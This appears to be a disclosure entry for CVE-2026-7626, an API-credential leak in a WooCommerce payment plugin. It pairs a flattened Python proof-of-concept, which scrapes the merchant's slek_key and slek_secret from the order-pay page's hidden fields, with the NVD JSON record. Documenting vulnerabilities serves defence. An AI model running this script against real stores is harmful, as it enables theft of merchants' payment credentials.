CVE-2026-7626

import requests from bs4 import BeautifulSoup # Proof of Concept: Extract Slek API credentials from the order-pay page # The attacker creates an order and navigates to the order-pay page. target_url = "http://target-site.com/checkout/order-pay/123/?key=wc_order_xxxx" # Simulate visiting the order pay page response = requests.get(target_url) if response.status_code == 200: soup = BeautifulSoup(response.text, 'html.parser') # Extract credentials from hidden input fields in the HTML form # Based on the description, these are placed directly in the form slek_key_input = soup.find('input', {'name': 'slek_key'}) slek_secret_input = soup.find('input', {'name': 'slek_secret'}) if slek_key_input and slek_secret_input: print(f"[+] Slek Key found: {slek_key_input.get('value')}") print(f"[+] Slek Secret found: {slek_secret_input.get('value')}") else: # Check for secrets in GET parameters within script tags or links if not in form print("[-] Credentials not found in form inputs, checking source code...") if "slek_secret" in response.text: print("[+] Potential secret exposure found in page source.") else: print(f"[-] Failed to retrieve page. Status code: {response.status_code}")

{"cve": {"id": "CVE-2026-7626", "sourceIdentifier": "[email protected]", "published": "2026-05-12T09:16:57.727", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Slek Gateway for WooCommerce plugin for WordPress is vulnerable to Information Exposure in version 1.0. This is due to the wsb_handle_slek_payment_redirect() function placing the merchant's slek_key and slek_secret API credentials directly into a client-side HTML form, and additionally embedding the slek_secret as a plaintext GET parameter in the IPN callback URL. This makes it possible for unauthenticated attackers who can place an order on the affected store to extract the merchant's API credentials by viewing the HTML source or using browser DevTools on the WooCommerce order-pay page before the JavaScript auto-submit fires."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/tags/1.0/slek-gateway-for-woocommerce.php#L267", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/tags/1.0/slek-gateway-for-woocommerce.php#L307", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/trunk/slek-gateway-for-woocommerce.php#L267", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/trunk/slek-gateway-for-woocommerce.php#L307", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/45ccc116-866e-467f-8ebb-8a3b6589c069?source=cve", "source": "[email protected]"}]}}